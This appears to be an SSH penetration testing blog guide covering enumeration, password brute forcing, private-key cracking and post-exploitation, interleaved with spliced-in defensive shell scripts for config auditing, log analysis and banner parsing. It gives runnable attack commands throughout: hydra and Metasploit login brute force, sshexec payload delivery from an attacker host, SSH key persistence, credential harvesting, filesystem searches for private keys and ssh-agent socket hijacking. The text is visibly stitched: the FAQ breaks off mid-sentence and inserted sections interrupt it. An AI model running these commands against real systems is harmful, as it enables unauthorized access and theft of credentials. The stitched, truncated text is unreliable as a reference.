Welcome to our comprehensive guide on SSH Penetration Testing. In this blog post we delve into the technical side of SSH pentesting, describing port 22 enumeration, exploitation and post-exploitation, with strategies to check the security of your own systems. SSH security is one of the topics we all need to understand: remote access services can be an entry point for malicious actors when configured improperly.

## SSH Introduction

Explaining how SSH works in detail is out of scope here; I assume you are already familiar with the service and with how it is configured on a Linux host.

Some things to remember: SSH listens on port 22 by default and uses a client-server architecture to access remote hosts securely.

SSH can implement different types of authentication, and each of them has its own security weaknesses, so keep that in mind! One of the most used methods is public key authentication with RSA keys, relying on the PKI infrastructure.
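The introduction notes that each authentication method carries its own weaknesses and, later, that tunnelling and agent forwarding are what make SSH useful for pivoting. The first thing a defender (or a tester reviewing a host they already have access to) checks is therefore what the daemon actually allows. The script below is an added example, not code from the original post: it writes two constructed sshd_config files (a weak one and a hardened one, with values chosen for illustration) to a temporary directory and audits the directives controlling root login, password authentication, TCP/agent/X11 forwarding and MaxAuthTries. It honours sshd's rule that the first occurrence of a keyword wins, but the small parser does not evaluate Match blocks or Include directives.

```shell
#!/bin/sh
# Added example: audit an sshd_config for settings that widen the attack surface.
# The two configs below are constructed samples written to a temp dir for the demo.

WORKDIR=$(mktemp -d)

# Weak configuration: root login, passwords and every forwarding feature enabled.
cat > "$WORKDIR/sshd_config.weak" <<'EOF'
# constructed sample, not a real host
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
AllowTcpForwarding yes
AllowAgentForwarding yes
X11Forwarding yes
MaxAuthTries 6
EOF

# Hardened counterpart: key-only logins, no root, no forwarding, fewer tries.
cat > "$WORKDIR/sshd_config.hardened" <<'EOF'
# constructed sample, not a real host
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowTcpForwarding no
AllowAgentForwarding no
X11Forwarding no
MaxAuthTries 3
EOF

# sshd_setting FILE KEY DEFAULT
# Print the effective value of KEY. sshd takes the FIRST occurrence of a keyword,
# matches keywords case-insensitively, and falls back to DEFAULT when the file
# is silent (Match blocks and Include are not handled by this small parser).
sshd_setting() {
  awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" -v def="$3" '
    $1 !~ /^#/ && tolower($1) == key { print $2; found = 1; exit }
    END { if (!found) print def }' "$1"
}

# audit_sshd_config FILE
# Print one finding per risky setting; prints nothing for a hardened file.
# The defaults passed to sshd_setting are the OpenSSH defaults.
audit_sshd_config() {
  f=$1
  [ "$(sshd_setting "$f" PermitRootLogin prohibit-password)" = yes ] &&
    echo "PermitRootLogin yes: root can log in directly with a password"
  [ "$(sshd_setting "$f" PasswordAuthentication yes)" = yes ] &&
    echo "PasswordAuthentication yes: exposed to password guessing"
  [ "$(sshd_setting "$f" AllowTcpForwarding yes)" != no ] &&
    echo "AllowTcpForwarding not disabled: port forwarding/pivoting possible"
  [ "$(sshd_setting "$f" AllowAgentForwarding yes)" != no ] &&
    echo "AllowAgentForwarding not disabled: forwarded agent sockets can be abused"
  [ "$(sshd_setting "$f" X11Forwarding no)" = yes ] &&
    echo "X11Forwarding yes: unnecessary channel for most servers"
  [ "$(sshd_setting "$f" MaxAuthTries 6)" -gt 3 ] &&
    echo "MaxAuthTries above 3: more guesses per connection"
  return 0
}

# audit_count FILE -> number of findings
audit_count() {
  audit_sshd_config "$1" | wc -l | tr -d ' '
}

for cfg in weak hardened; do
  echo "== $WORKDIR/sshd_config.$cfg: $(audit_count "$WORKDIR/sshd_config.$cfg") finding(s)"
  audit_sshd_config "$WORKDIR/sshd_config.$cfg"
done
```

Run it against a real file with `audit_sshd_config /etc/ssh/sshd_config`; the weak sample produces six findings and the hardened one none. Note that a directive that is merely commented out is ignored, exactly as sshd ignores it, so the audit reports the OpenSSH default in that case.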
Another great feature is the possibility to create encrypted tunnels between machines or to forward ports to local or remote services. As pentesters we can use it to pivot inside the network under the radar, since SSH is a well-known tool that sysadmins use every day.

## Managing SSH Service

Verify the SSH server status:

```bash
systemctl status ssh
```

Start the SSH service:

```bash
systemctl start ssh
```

Stop the SSH service:

```bash
systemctl stop ssh
```

Restart the SSH service:

```bash
systemctl restart ssh
```

Enable the SSH server to start on boot:

```bash
systemctl enable ssh
```

## SSH Interesting Files

When performing SSH penetration testing, several files may contain sensitive information and can be targeted by an attacker.

### Client Config

The SSH client configuration file can be used to automate configurations or to jump between machines; take some time and check the file:

```bash
vi /etc/ssh/ssh_config
```

### Server Config

This file contains the configuration settings for the SSH daemon and is the target of configuration-based attacks.

```bash
vi /etc/ssh/sshd_config
```

Recommendation: check whether tunnelling and agent forwarding are enabled; they help you with lateral movement.

### Authorized Keys

This file contains the public keys that are authorized to access a user's account; an attacker who can write to it gains unauthorized access.

```bash
vi /etc/ssh/authorized_keys
```

### Known Hosts

```bash
cat /home/rfs/.ssh/known_hosts
```

### RSA Keys

Default folder containing the user's keys:

```bash
cd ~/.ssh
cd /home/rfs/.ssh
```

## SSH Authentication Types

| Authentication Type | Description |
|---|---|
| Password Authentication | Users enter a password to authenticate. This is the most common method but poses security risks if weak passwords are used. |
| Public Key Authentication | Uses a pair of cryptographic keys, a public key and a private key. The public key is stored on the server and the private key is kept securely on the client. Offers strong security and is less susceptible to brute-force attacks. |
| Keyboard-Interactive Authentication | Allows for a more interactive authentication process, including methods like challenge-response. Often used for multi-factor authentication (MFA) where users need to respond to dynamic challenges. |
| Host-Based Authentication | Authenticates based on the host system rather than individual users. It relies on the client system's host key and the server's configuration. This method is less secure and not widely recommended. |
| Certificate-Based Authentication | Uses keys signed by a trusted certificate authority (CA); the server trusts the CA rather than each individual public key, which simplifies key distribution and revocation. |
| Multi-Factor Authentication (MFA) | Involves using two or more authentication methods, such as a combination of a password, biometric data, or a security token. Provides an extra layer of security to ensure the authenticity of the user. |

Ok, let's talk about how to pentest SSH. As you know, it all starts with enumeration; we can use some tools to do all the work for us or we can do it manually.

Some questions to ask before starting to enumerate:

- Is there any SSH server running?
- On what port?
- What version is running?
- Is there any exploit for that version?
- What authentication type is used? Passwords / RSA keys?
- Is it blocking brute force?

After we have all the answers we can start thinking about what to do. If we don't have any information about users or passwords/keys yet, it is better to search for an exploit; unfortunately, SSH exploits are rare. Search my website for any exploits.

Damn it, we are stuck :/ It's time to go enumerate other services and try to find something that can be used, like usernames or RSA keys. Remember, keys usually have the username at the bottom.

Assuming we found one or more usernames, we can try to brute force the service using a good wordlist, or, if we were lucky and found an RSA key with a username: We Are In!
Haha, it is not so easy, but OK, we are learning...

## SSH Hacking Tools

| Tool Name | Description | Usage |
|---|---|---|
| Hydra | Password cracking tool for various protocols, including SSH | Brute-force attacks on SSH passwords |
| Nmap | Network scanning tool that can identify open SSH ports | Reconnaissance on target systems |
| Metasploit | Framework with various modules, including those for SSH exploitation | Exploiting vulnerabilities in SSH services |
| John the Ripper | Password cracking tool for various password hashes | Cracking SSH password hashes |
| Wireshark | Network protocol analyzer | Captures and analyzes SSH traffic |
| SSHDump | Sniffing tool for capturing SSH traffic | Monitors and captures SSH packets |

## 1. SSH Enumeration

During the enumeration process, cybersecurity professionals seek to gather details such as active SSH hosts, supported algorithms, version information, and user accounts. This information is instrumental in performing a thorough security analysis, enabling practitioners to identify potential weaknesses and implement the measures needed to fortify the SSH implementation against unauthorized access and exploitation.

After we scan a network and identify port 22 open on a remote host, we need to identify which SSH service is running and which version. We can use Nmap:

```bash
nmap -sV -p22 192.168.1.96
```

### SSH Banner Grabber

Banner grabbing is an easy technique, but it can help us a lot: we can verify which service version is running on the remote server and try to find a CVE related to it.

Banner grabbing can be useful for several reasons, including:

- Identifying the version and type of SSH server: this information can be used to determine if the SSH server is vulnerable to known exploits or if there are any known security issues with the version of the software being used.
- Checking for compliance with organizational security policies: administrators may want to ensure that all SSH servers in their organization are configured to display a standard banner message that includes specific information.
- Verifying the authenticity of an SSH server: banner messages can be used to verify that the SSH server being accessed is the intended one, rather than a fake or rogue server.

Several tools can be used for SSH banner grabbing, such as Nmap, Netcat, and SSH-Banner. These tools connect to an SSH server and retrieve the banner message, which can then be analyzed to see what information is being displayed.

```bash
nc 192.168.1.96 22
```

If we connect using the verbose parameter we can see all the information needed to authenticate on the remote server:

```bash
ssh -v 192.168.1.96
```

### SSH Servers List

| SSH Server | Description |
|---|---|
| OpenSSH | Open-source SSH server widely used in Unix-like operating systems |
| Dropbear | Lightweight and efficient SSH server primarily designed for embedded systems |
| Bitvise SSH Server | SSH server for Windows with additional features like remote administration |
| Tectia SSH Server | Commercial SSH server solution by SSH Communications Security |
| ProFTPD with mod_sftp | FTP server with SFTP support using mod_sftp |

### Detect SSH Authentication Type

To detect the SSH authentication type used to access a system, examine the system logs: the authentication method is logged when a user authenticates to the system via SSH.

Here is how you can check the SSH authentication type on a Linux system:

- Open the system log file at /var/log/auth.log with your preferred text editor.
- Search for the line that contains the login information of the user you want to check.
- Look for the "Accepted" keyword in the line, which indicates that the authentication was successful.

From the client side, the verbose flag shows which authentication methods the server offers:

```bash
ssh -v 192.168.1.96
```

### Detect remote users

```bash
msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers
```
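The steps above say to look for the "Accepted" keyword in /var/log/auth.log. The script below is an added example, not code from the original post: it writes a handful of constructed auth.log lines (host name, users, addresses and timestamps are all invented for the demo) to a temporary file, then extracts the authentication method, user and source address of every successful login and counts failed attempts per source, so that the password guessing described in the Exploitation section stands out in the logs. It assumes the classic syslog line format that OpenSSH writes to auth.log; journalctl output has a different prefix, which is why the parser locates the "Accepted"/"Failed" keywords by name instead of relying on fixed column numbers.

```shell
#!/bin/sh
# Added example: summarise SSH authentication from auth.log-style lines.
# The log below is constructed for the demo; every host, user and address is invented.

LOG=$(mktemp)
cat > "$LOG" <<'EOF'
Mar  4 10:01:02 lab sshd[1201]: Accepted publickey for rfs from 192.168.1.50 port 51234 ssh2: RSA SHA256:constructed-fingerprint
Mar  4 10:02:10 lab sshd[1210]: Accepted password for msfadmin from 192.168.1.96 port 40122 ssh2
Mar  4 10:02:11 lab sshd[1215]: Failed password for msfadmin from 192.168.1.107 port 40130 ssh2
Mar  4 10:02:12 lab sshd[1216]: Failed password for msfadmin from 192.168.1.107 port 40131 ssh2
Mar  4 10:02:13 lab sshd[1217]: Failed password for invalid user admin from 192.168.1.107 port 40132 ssh2
Mar  4 10:02:14 lab sshd[1218]: Failed password for invalid user admin from 192.168.1.107 port 40133 ssh2
Mar  4 10:02:15 lab sshd[1219]: Failed password for root from 192.168.1.107 port 40134 ssh2
Mar  4 10:02:16 lab sshd[1220]: Failed password for root from 192.168.1.107 port 40135 ssh2
Mar  4 10:02:30 lab sshd[1225]: Failed password for rfs from 192.168.1.50 port 51300 ssh2
Mar  4 10:03:00 lab sshd[1240]: Accepted keyboard-interactive/pam for rfs from 192.168.1.51 port 50000 ssh2
Mar  4 10:03:05 lab CRON[1250]: pam_unix(cron:session): session opened for user root by (uid=0)
EOF

# accepted_logins LOG -> one "METHOD USER SOURCE" line per successful login.
# Keywords are located by name, so the length of the syslog prefix does not matter.
accepted_logins() {
  awk '/sshd\[[0-9]+\]: Accepted / {
         method = ""; user = ""; ip = ""
         for (i = 1; i <= NF; i++) {
           if ($i == "Accepted") method = $(i + 1)
           if ($i == "for")      user   = $(i + 1)
           if ($i == "from")     ip     = $(i + 1)
         }
         print method, user, ip
       }' "$1"
}

# count_accepted_by_method LOG METHOD -> number of successful logins using METHOD
count_accepted_by_method() {
  accepted_logins "$1" | awk -v m="$2" '$1 == m' | wc -l | tr -d ' '
}

# failed_by_source LOG -> "COUNT SOURCE" per address, most failures first.
# "Failed password for invalid user X from IP" has extra words before "from",
# which is why the address is taken from the token after "from".
failed_by_source() {
  awk '/sshd\[[0-9]+\]: Failed / {
         for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1)
       }' "$1" | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# bruteforce_sources LOG THRESHOLD -> addresses with at least THRESHOLD failures
bruteforce_sources() {
  failed_by_source "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

echo "== successful logins (method user source)"
accepted_logins "$LOG"
echo "== failed logins per source"
failed_by_source "$LOG"
echo "== sources at or above 5 failures"
bruteforce_sources "$LOG" 5
```

Point the functions at the real file (`accepted_logins /var/log/auth.log`, or /var/log/secure on Red Hat-style systems) to get the same summary for a live host; a source that shows up under `bruteforce_sources` with a low threshold and then appears in `accepted_logins` with method `password` is exactly the sequence a hydra run against a weak account leaves behind.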
## 2. SSH Exploitation

At this point we only know which service is running on port 22 and its version (OpenSSH_4.7p1 Debian-8ubuntu1). Assuming we have found the username msfadmin, we will try to brute-force his password using hydra.

### Bruteforce SSH Service

```bash
hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
```

```bash
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
```

With Metasploit:

```
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run
```

### Crack SSH Private Keys

```bash
ssh2john id_rsa.priv > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

### Default Credentials

https://github.com/PopLabSec/SSH-default-Credentials

### SSH Bad Keys

Some embedded devices ship with static SSH keys; you can find a collection of them here:

https://github.com/poplabdev/ssh-badkeys

### SSH Exploits

| Version | Exploit |
|---|---|
| OpenSSH | |

## 3. SSH Post Exploitation

### SSH Persistence

```
set session 1
msf post(sshkey_persistence) > exploit
```

### SSH User Code Execution

```
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set rhosts 192.168.1.103
msf exploit(sshexec) > set username rfs
msf exploit(sshexec) > set password poplabsec
msf exploit(sshexec) > set srvhost 192.168.1.107
msf exploit(sshexec) > exploit
```

### SSH Lateral Movement

Lateral movement aims to extend an attacker's reach, enabling them to traverse the network, escalate privileges and access sensitive resources.

Read more about Pivoting using SSH.

### Steal SSH credentials

If we have a meterpreter shell we can use the post-exploitation module post/multi/gather/ssh_creds to collect all SSH credentials on the machine.

```
use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit
```

### Search SSH Key files

```bash
find / -name "*id_rsa*" 2>/dev/null
```

### Search SSH Key files inside file content

```bash
grep -rl "PRIVATE KEY" / 2>/dev/null
```

### SSH Hijacking

Find the sshd process:

```bash
ps aux | grep sshd
```

The attacker looks for SSH_AUTH_SOCK in the victim's environment variables:

```bash
grep SSH_AUTH_SOCK /proc/<PID>/environ
```

The attacker hijacks the victim's ssh-agent socket:

```bash
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
```

The attacker can then log in to remote systems as the victim:

```bash
ssh 192.168.1.107 -l victim
```

## SSH Tunnels

SSH tunnels are a powerful and secure mechanism for establishing encrypted communication channels inside computer networks. Built on the Secure Shell (SSH) protocol, they create a secure conduit for data transfer and communication between local and remote systems.

| Tunnel Type | Description | Use Case |
|---|---|---|
| Local Port Forwarding | Forwards traffic from a local port to a remote destination through the SSH server | Securely access services on a remote server from the local machine |
| Remote Port Forwarding | Forwards traffic from a remote port to a local destination through the SSH server | Expose a local service to a remote server securely |
| Dynamic Port Forwarding | Creates a dynamic SOCKS proxy on the local machine, allowing multiple connections to pass through the SSH tunnel | Browsing the internet securely and anonymously through the SSH tunnel |
| X11 Forwarding | Enables secure forwarding of graphical applications from a remote server to the local machine | Running graphical applications on a remote server and displaying them locally |
| Tunneling for File Transfer | Facilitates secure file transfer by tunneling FTP or other protocols through the SSH connection | Securely transfer files between systems using non-secure protocols |

## SSH Logs

To view SSH-related logs, you can use grep to filter out the sshd entries.
```bash
grep sshd /var/log/auth.log
```

Or, on systems that log to /var/log/secure:

```bash
grep sshd /var/log/secure
```

## List of Tools that use SSH

| Tool Name | Description |
|---|---|
| SCP (Secure Copy) | Command-line tool for securely copying files between local and remote systems using SSH |
| SFTP (Secure FTP) | File transfer protocol that operates over SSH, providing secure file access, transfer, and management |
| rsync | Utility for efficiently syncing files and directories between systems, often used with SSH for secure synchronization |
| Git | Distributed version control system; supports SSH for secure repository access and management |
| Ansible | Automation tool for configuration management and application deployment; uses SSH for communication with remote hosts |
| PuTTY | Free SSH and Telnet client for Windows, widely used for interactive remote access |
| WinSCP | Windows-based open-source SFTP, FTP, WebDAV, and SCP client for secure file transfer |
| Cyberduck | Libre and open-source client for FTP, SFTP, WebDAV, Amazon S3, and more, with SSH support |
| MobaXterm | Enhanced terminal for Windows with X11 server, tabbed SSH client, and various network tools |
| Terminus (formerly Pantheon Terminus) | Windows-based terminal emulator; supports SSH for secure remote access to Unix-like systems |

## F.A.Q

### What is SSH Penetration Testing?

SSH Penetration Testing is the process of testing and identifying vulnerabilities in the Secure Shell (SSH) protocol implementation, configuration, and access control. It involves various attacks to determine if a system is vulnerable to unauthorized access, data theft, or system compromise.

### What are the standard SSH Penetration Testing techniques?

Common SSH Penetration Testing techniques include password guessing, SSH banner grabbing, protocol fuzzing, denial of service (DoS) attacks, man-in-the-middle (MITM) attacks, attacks on key-based authentication, and the search for configuration errors.

### What is the purpose of SSH Penetration Testing?

The purpose of SSH Penetration Testing is to identify security weaknesses in the SSH protocol implementation, configuration, and access control, and to help organizations improve their security posture by addressing the identified vulnerabilities.

### Can SSH Penetration Testing be performed without permission?

No, SSH Penetration Testing should not be performed without proper authorization. Unauthorized penetration testing is illegal and can lead to serious legal consequences.

### What should be done after SSH Penetration Testing?

After
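Returning to the SSH Banner Grabber section above: the first line the server sends (what `nc 192.168.1.96 22` prints) is the identification string `SSH-protoversion-softwareversion`, optionally followed by a space and a comment. The function below is an added example rather than code from the original post. It splits that string into protocol version, product, version and comment using only shell parameter expansion, and flags servers that still advertise protocol 1 (protoversion 1.99 or 1.x), which serves both the version inventory the post recommends building and the compliance check it mentions. The banners at the bottom are constructed samples, not captures from real hosts.

```shell
#!/bin/sh
# Added example: parse an SSH identification string as sent at the start of the
# connection, e.g. the first line shown by "nc HOST 22" or "ssh -v HOST".
# Format (RFC 4253): SSH-protoversion-softwareversion [SP comments] CR LF

# parse_ssh_banner LINE -> "PROTO|PRODUCT|VERSION|COMMENTS"; exit 1 if not SSH
parse_ssh_banner() {
  banner=$(printf '%s' "$1" | tr -d '\r')   # banners end in CR LF
  case "$banner" in
    SSH-*-*) ;;
    *) echo "not an SSH identification string"; return 1 ;;
  esac
  rest=${banner#SSH-}            # protoversion-softwareversion [comments]
  proto=${rest%%-*}              # up to the first '-'
  rest=${rest#*-}                # softwareversion [comments]
  comments=""
  case "$rest" in
    *" "*) comments=${rest#* } ;;
  esac
  software=${rest%% *}           # softwareversion without comments
  # OpenSSH and Dropbear use product_version; a token without '_' keeps the
  # whole token as the product and leaves the version empty.
  case "$software" in
    *_*) product=${software%%_*}; version=${software#*_} ;;
    *)   product=$software;        version="" ;;
  esac
  printf '%s|%s|%s|%s\n' "$proto" "$product" "$version" "$comments"
}

# banner_offers_protocol1 LINE -> exit 0 when the server still advertises
# SSH protocol 1 (protoversion 1.x, or 1.99 meaning "both 1 and 2").
banner_offers_protocol1() {
  proto=$(parse_ssh_banner "$1" | cut -d'|' -f1)
  case "$proto" in
    1.*) return 0 ;;
    *)   return 1 ;;
  esac
}

# Constructed sample banners (not captured from real hosts), including one
# non-SSH reply to show the error path.
for b in "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1" \
         "SSH-1.99-OpenSSH_4.7p1 Debian-8ubuntu1" \
         "SSH-2.0-dropbear_2019.78" \
         "HTTP/1.1 400 Bad Request"; do
  if out=$(parse_ssh_banner "$b"); then
    printf '%-40s -> %s' "$b" "$out"
    banner_offers_protocol1 "$b" && printf ' [protocol 1 offered]'
    echo
  else
    echo "$b -> $out"
  fi
done
```

To feed it a live banner, pipe the first line of a real connection in, for example `parse_ssh_banner "$(nc -w 3 HOST 22 | head -n 1)"`; the product and version fields are what you would match against an inventory or a CVE database, and the protocol field tells you whether the legacy protocol is still switched on.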